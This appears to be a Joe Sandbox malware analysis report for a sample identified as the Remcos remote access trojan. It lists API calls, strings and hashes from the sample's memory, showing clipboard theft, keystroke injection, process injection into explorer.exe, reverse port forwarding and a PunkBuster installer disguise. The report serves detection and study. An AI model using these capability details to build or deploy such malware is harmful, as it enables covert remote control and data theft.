                                              • _free.LIBCMT ref: 00106E38
                                              • _free.LIBCMT ref: 00106E46
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: d2fff9de772c22dabfd63783a88431a84e9e7e0cde74488d30f5b7229a65ea1b
                                              • Instruction ID: 1e91b7432a37d6593a24ff3c9a074a75cab4aff2b8a16235c39c158f2ef69ca1
                                              • Opcode Fuzzy Hash: d2fff9de772c22dabfd63783a88431a84e9e7e0cde74488d30f5b7229a65ea1b
                                              • Instruction Fuzzy Hash: 5211777560010CEFCB05FF54C942CD93B65EF14360B55C4A5B9885F1A6DB71EA749F80
                                              APIs
                                                • Part of subcall function 0042AC50: LoadLibraryA.KERNEL32(?,?,0042B213,00000000), ref: 0042AC74
                                              • SendMessageA.USER32(?,0000045B,00000001,00000000), ref: 0042B395
                                              • SendMessageA.USER32(?,00000445,00000000,00000001), ref: 0042B3A6
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,FFFFFFFF,00000000,?,?,?,000000FF,?), ref: 0042B3BB
                                              Strings
                                              • RICHEDIT, xrefs: 0042B21A
                                              • Impossible to create a rich edit control, using simple text control instead. Please reinstall riched32.dll, xrefs: 0042B234
                                              • RICHEDIT50W, xrefs: 0042B1CC
                                              • RichEdit20A, xrefs: 0042B1EA
                                              • EDIT, xrefs: 0042B15D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: MessageSend$LibraryLoadWindow
                                              • String ID: EDIT$Impossible to create a rich edit control, using simple text control instead. Please reinstall riched32.dll$RICHEDIT$RICHEDIT50W$RichEdit20A
                                              • API String ID: 3695014736-220143130
                                              • Opcode ID: 4bb688596893958bd9d614b47f0125ef2eb3f465bd2d6de7e778d3cc8adcd05b
                                              • Instruction ID: fd1f3e6eab14dd8ec65f4d08ef4d7de20f72b4bfebd2e21d27a059feec06a27f
                                              • Opcode Fuzzy Hash: 4bb688596893958bd9d614b47f0125ef2eb3f465bd2d6de7e778d3cc8adcd05b
                                              • Instruction Fuzzy Hash: B08102702047508BD310DF28E845BAFB7A0FF95368F540B5EF5A5973D2C778A8058BAA
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 000D912D
                                              • GdiplusStartup.GDIPLUS(00133AF0,?,00000000), ref: 000D915F
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 000D91EB
                                              • Sleep.KERNEL32(000003E8), ref: 000D926D
                                              • GetLocalTime.KERNEL32(?), ref: 000D927C
                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 000D9365
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                              • API String ID: 489098229-3790400642
                                              • Opcode ID: fe2d4490dae4c22f34141791f2ce2c2759129795435502495afa756c3967c8f1
                                              • Instruction ID: 9ecea1e25b6bf8f06498f466fbf02e9a890cbf02c160447e79ce8294567310c1
                                              • Opcode Fuzzy Hash: fe2d4490dae4c22f34141791f2ce2c2759129795435502495afa756c3967c8f1
                                              • Instruction Fuzzy Hash: 80518D71A00254AACB14BBB4DC56EFE7BB9AB56300F40406EF446E7283EF345E85C761
                                              APIs
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 00408012
                                              • _strncat.LIBCMT ref: 00408025
                                                • Part of subcall function 004070CD: __EH_prolog.LIBCMT ref: 004070D2
                                                • Part of subcall function 004076BA: __EH_prolog.LIBCMT ref: 004076BF
                                                • Part of subcall function 004076BA: GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 0040770C
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 00407786
                                                • Part of subcall function 00407E0F: __EH_prolog.LIBCMT ref: 00407E14
                                                • Part of subcall function 0040D2B8: __EH_prolog.LIBCMT ref: 0040D2BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog$_strncat$DirectorySystem
                                              • String ID: %s %s$ PunkBuster DLL Install Files Included$32-bit$64-bit$Starting PunkBuster Service Installer (v%d.%d) (%s)$\LogFiles\PunkBuster\pbsvc.log
                                              • API String ID: 1593959897-659667646
                                              APIs
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00115DAF), ref: 0011515C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DecodePointer
                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                              • API String ID: 3527080286-3064271455
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 000D665C
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              • Sleep.KERNEL32(00000064), ref: 000D6688
                                              • DeleteFileW.KERNEL32(00000000), ref: 000D66BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreateDeleteExecuteShellSleep
                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                              • API String ID: 1462127192-2001430897
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00134A28,00000000,001342E0,00003000,00000004,00000000,00000001), ref: 000C6647
                                              • GetCurrentProcess.KERNEL32(00134A28,00000000,00008000,?,00000000,00000001,00000000,000C68BB,C:\Users\user\Desktop\4wECQoBvYC.exe), ref: 000C6705
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentProcess
                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                              • API String ID: 2050909247-4242073005
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000DC988
                                                • Part of subcall function 000DCA1F: RegisterClassExA.USER32(00000030), ref: 000DCA6C
                                                • Part of subcall function 000DCA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 000DCA87
                                                • Part of subcall function 000DCA1F: GetLastError.KERNEL32 ref: 000DCA91
                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 000DC9BF
                                              • lstrcpynA.KERNEL32(00133B68,Remcos,00000080), ref: 000DC9D9
                                              • Shell_NotifyIconA.SHELL32(00000000,00133B50), ref: 000DC9EF
                                              • TranslateMessage.USER32(?), ref: 000DC9FB
                                              • DispatchMessageA.USER32(?), ref: 000DCA05
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 000DCA12
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                              • String ID: Remcos
                                              • API String ID: 1970332568-165870891
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00112E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00112BD6
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00112E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00112C59
                                              • __alloca_probe_16.LIBCMT ref: 00112C91
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00112E03,?,00112E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00112CEC
                                              • __alloca_probe_16.LIBCMT ref: 00112D3B
                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00112E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00112D03
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00112E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00112D7F
                                              • __freea.LIBCMT ref: 00112DAA
                                              • __freea.LIBCMT ref: 00112DB6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                              • String ID:
                                              • API String ID: 201697637-0
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00494477
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: !$%02d$%03d$%04d$Courier New$L
                                              • API String ID: 885266447-3614883530
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • _memcmp.LIBVCRUNTIME ref: 001046A3
                                              • _free.LIBCMT ref: 00104714
                                              • _free.LIBCMT ref: 0010472D
                                              • _free.LIBCMT ref: 0010475F
                                              • _free.LIBCMT ref: 00104768
                                              • _free.LIBCMT ref: 00104774
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorLast$_abort_memcmp
                                              • String ID: C
                                              • API String ID: 1679612858-1037565863
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00402109
                                                • Part of subcall function 004016A9: __EH_prolog.LIBCMT ref: 004016AE
                                                • Part of subcall function 004015D3: __EH_prolog.LIBCMT ref: 004015D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $Copy$PunkBuster Services Test$button$dialog$text
                                              • API String ID: 3519838083-3589454768
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: tcp$udp
                                              • API String ID: 0-3725065008
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Eventinet_ntoa
                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                              • API String ID: 3578746661-168337528
                                              APIs
                                              • CreateDialogIndirectParamA.USER32(00000000,?,?,004B4820,00000000), ref: 00424232
                                              • SetWindowLongA.USER32(?,000000EC,?), ref: 00424285
                                              • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00424576,00000000,?,?), ref: 004242B2
                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 0042433C
                                              • MoveWindow.USER32(?,?,?,00000000,?,00000000,?,?,?,?,?,?), ref: 004243CC
                                              • SetWindowTextA.USER32(?,00000000), ref: 004243E7
                                              Strings
                                              • Can't create dialog using memory template, xrefs: 00424242
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Window$CreateDialogIndirectLongMessageMoveParamSendText
                                              • String ID: Can't create dialog using memory template
                                              • API String ID: 3198842173-1473080150
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004064A4
                                              • 80000002.OLEAUT32(?,?,?,?,?,?,?,?,00000001,?,00000401), ref: 0040651F
                                              • 80000006.COMCTL32(?,?,?,?,?,?,?,?,00000001,?,00000401), ref: 00406630
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: 8000000280000006H_prolog
                                              • String ID: Message$SysAllocString failed: 0x%08lx$get_AuthorizedApplications failed: 0x%08lx$get_Enabled failed: 0x%08lx
                                              • API String ID: 214935-104412183
                                              • Opcode ID: 691445288035ba92857fa2f194e939a569db9ae7efce4dbcbc8219a4a60ad1d2
                                              • Instruction ID: 08d0d689e4b1c90c8307d53243ab566afb64f0a8895c35ba328b35e1111ee248
                                              • Opcode Fuzzy Hash: 691445288035ba92857fa2f194e939a569db9ae7efce4dbcbc8219a4a60ad1d2
                                              • Instruction Fuzzy Hash: 4651CF7090014AAFCB00EF95CC85EAEBBB8AF08314F60466DF516B72D1D7789E44CB65
                                              APIs
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00125554), ref: 000D6F24
                                              • CloseHandle.KERNEL32(00000000), ref: 000D6F2D
                                              • DeleteFileA.KERNEL32(00000000), ref: 000D6F3C
                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 000D6EF0
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                              • String ID: <$@$Temp
                                              • API String ID: 1107811701-1032778388
                                              • Opcode ID: a7af5f12961cb0846b8b0bc4fbffc0f97afbc410a3e8e812d740fcf66dda498f
                                              • Instruction ID: e58adba916d65d882e75df37f9e53c6e5cdb18bbaa06cc3d9b29d55418f61777
                                              • Opcode Fuzzy Hash: a7af5f12961cb0846b8b0bc4fbffc0f97afbc410a3e8e812d740fcf66dda498f
                                              • Instruction Fuzzy Hash: DA316A319002199BDB18FBA4DD52FEE7776AF52300F40416CF506A62E3EF701A8ACB90
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00125454,?,?,00000000,000C7273,00000000,?,0000000A,00000000), ref: 000C6C38
                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,000C7273,00000000,?,0000000A,00000000), ref: 000C6C80
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000C7273,00000000,?,0000000A,00000000,00000000), ref: 000C6CC0
                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 000C6CDD
                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 000C6D08
                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 000C6D18
                                                • Part of subcall function 000C455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,000C460E,00000000,?,?), ref: 000C456A
                                                • Part of subcall function 000C455B: SetEvent.KERNEL32(?,?,?,000C460E,00000000,?,?), ref: 000C4588
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                              • String ID: .part
                                              • API String ID: 1303771098-3499674018
                                              • Opcode ID: 64ae2d1a369974c8f7283b0b18b43fe4bccc2c3b1d81d1a718a6e2df665de11d
                                              • Instruction ID: 2910a78d9b1eb9f2f7eab13eef5c9c9553ded4efee61f21f503c598bc71d6c12
                                              • Opcode Fuzzy Hash: 64ae2d1a369974c8f7283b0b18b43fe4bccc2c3b1d81d1a718a6e2df665de11d
                                              • Instruction Fuzzy Hash: AF31A071908301AFC324EF20DD85EEFB7E8FB85711F00491DF9C192292DB71AA488B92
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000FD564,000FD564,?,?,?,00109BA1,00000001,00000001,1AE85006), ref: 001099AA
                                              • __alloca_probe_16.LIBCMT ref: 001099E2
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00109BA1,00000001,00000001,1AE85006,?,?,?), ref: 00109A30
                                              • __alloca_probe_16.LIBCMT ref: 00109AC7
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00109B2A
                                              • __freea.LIBCMT ref: 00109B37
                                                • Part of subcall function 00106AFF: RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              • __freea.LIBCMT ref: 00109B40
                                              • __freea.LIBCMT ref: 00109B65
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                              • String ID:
                                              • API String ID: 3864826663-0
                                              • Opcode ID: 7d7d242d0bd29555b5b57feb87868826dde12d10d9f9e84d4ba5393f1bb1cd81
                                              • Instruction ID: fb73250609fb7c34ad8864121a803a8673d07a3ef84b48beb1c10ec48399f885
                                              • Opcode Fuzzy Hash: 7d7d242d0bd29555b5b57feb87868826dde12d10d9f9e84d4ba5393f1bb1cd81
                                              • Instruction Fuzzy Hash: C4510472A10206AFDB298F64DCA1EBB77A9EB44760F158628FC44D71C2DBB4DC40C660
                                              APIs
                                              • SendInput.USER32 ref: 000D8B08
                                              • SendInput.USER32(00000001,?,0000001C), ref: 000D8B30
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8B57
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8B75
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8B95
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8BBA
                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 000D8BDC
                                              • SendInput.USER32(00000001,?,0000001C), ref: 000D8BFF
                                                • Part of subcall function 000D8AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 000D8AB7
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InputSend$Virtual
                                              • String ID:
                                              • API String ID: 1167301434-0
                                              • Opcode ID: 086bd1f51a30275f4d031fc06a3259297534a9c9b83de2749828b519e23a1954
                                              • Instruction ID: db2fcf2971bb5de0c0ad0e45b636e8e3057ab9c35b20bdd9671551b3d771bbc4
                                              • Opcode Fuzzy Hash: 086bd1f51a30275f4d031fc06a3259297534a9c9b83de2749828b519e23a1954
                                              • Instruction Fuzzy Hash: 3D31AF71248349A9E210DF69D841F9FFBECAF89B50F04080FB98497291DAA0D94C87B7
                                              APIs
                                              • OpenClipboard.USER32 ref: 000D5A46
                                              • EmptyClipboard.USER32 ref: 000D5A54
                                              • CloseClipboard.USER32 ref: 000D5A5A
                                              • OpenClipboard.USER32 ref: 000D5A61
                                              • GetClipboardData.USER32(0000000D), ref: 000D5A71
                                              • GlobalLock.KERNEL32(00000000), ref: 000D5A7A
                                              • GlobalUnlock.KERNEL32(00000000), ref: 000D5A83
                                              • CloseClipboard.USER32 ref: 000D5A89
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Memory Dump Source
